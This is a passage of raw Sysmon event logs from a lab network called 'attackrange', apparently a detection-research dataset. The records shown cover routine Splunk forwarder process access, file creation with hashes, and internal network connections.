Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42D11B1F7A9835F1078CE6F2229BC346,SHA256=D2FD78C607BED348B71085019D39787476634DA891486F28F59C72BF314AA20B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.423{0C1E0330-F354-60EB-4F79-00000000D001}15202912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.267{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6465314F05003E2DBE9B9D95C10AD84E,SHA256=A009A180B4489E553A9B4A391FA2A115A3BB4B322CBA6776ED5327227D940C19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:29.845{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D494722E8726B7405D5D4053539DDB7,SHA256=96A20DD0B56903AFA6BD08C43BB8454466BDC5C61073B21C52A43B8FFE842EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:29.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E48EF48A0536A1555F2275D02A082E,SHA256=AF131505DDC23A481D3F9398B4CB4478E5B7704D5D25B25184649F5891BD4EE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:29.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B14B97E1DEBB2F389C9866422928D3DC,SHA256=23288CE851C87801EA1739F1C2FD30BBB6322ED4B7F1461AAA29BE972723B74C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:30.860{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67ADAB24D3EC4038A25DDF6F50539DB9,SHA256=9CD3817201CA555AB6CCAA53F8B392C72173E531448F9EA96CC5C040DDBCC21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:30.687{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A48B61D9724FEC5DE707A498453951F2,SHA256=2E9108651E8D8C5159CB58AA84A64187449A365FFA708F60599BFBE357C492C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:30.063{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=EBB4195CA1A3A3D6A53E4A12138C757D,SHA256=10A16A33CE3687198F34E3F9EF058DA81E7D90EE3B4A939A928FC4C751C9E06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:31.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E556968F159BEC8C8CC21354EF29539,SHA256=F3001B262E6198F87F86FF6490EAF4324316AA35B9FA8962D2AE4F66152EDDF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:31.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87ECCFCF7E79C9BD9FA002B6395E4557,SHA256=7CC9F5DF709A871B21C365D2958AD6A4A9BAD0143D7FE2AD52B749CFF48DA9C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:32.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24FE51639AD0A0C2FEFB0B59E290D903,SHA256=336F97E0A5BCD0A1A44BE5E58C746B23794AE0F513E168AE5B0F12554F0BBE6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:32.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24EB1F6A4910C1ACE722BBD8B123BA05,SHA256=181E915E15185EB63BA263F1BC0D6E5FC1E7BEE96F15C56933403AA4F71DBCA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:31.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:33.908{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA0CEB49C0985E6CF117AB683DB0AF1,SHA256=26D10F8AFDE011BA3C1CD05FBA4A257C20DA3F2A8A2400BBCB449BE6F7EF2432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:33.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F7EDFA49A35351F8FB4D04D55687CB,SHA256=F98E63D7B7837115747A6E2FE42675FA31C296D44297A82FEC85181A03B07273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:34.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=583FA28E855FA9CC741708EF30038915,SHA256=DB40701B4AE9F2AAA042AA06E4DFB8EE894D17C5325F01100B77CA4D50C5826F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:34.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8591C1245CB700F11AB366EBE7E1A1D5,SHA256=AB73940B03C8332B598FB84D948C3121089704DEAFD93D21FCBE8EAA10C17D4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:25.607{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50941-false10.0.1.12-8000- 23542300x8000000000000000806562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:35.970{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=175142F17EFA94DC0EC914C497CEC782,SHA256=2A33081BEAC8411976E09F895D5F4651D83443E172FA136DDDDE657A0311DE64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:35.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579203ADED623871968C6D0C7BF82588,SHA256=BAE4A301084573E6C22F54F3529D522CA9637A144CC547A66C2B51FA64CDBEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:36.766{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D9551E9281D89E67F54467E99DA055,SHA256=7579F1BD7469E7279B405E558EE0349812B274A651B6E5DE24A07A00A525CFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:37.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1403FED87C7317B13A14CC162880E5A,SHA256=A0F21E87D48389DA185CD7C34B3D52EA2B5035DB874502E1B1927C53743CEBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:37.002{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48387DC30F6C2B18D8B5F6CA194F6A80,SHA256=23268A12013611CC3D64A0D9B4E34B372DD10A9CC37FC63372B3772D33FD1640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:38.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5CBB383205CFCEB67B5CC53FC9E2E1A,SHA256=F60A6CF5F5BF708F3598651EEFDFA0CD9E641FC15A8D1BB5806AF623A9E76CBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:37.197{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57191-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:38.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 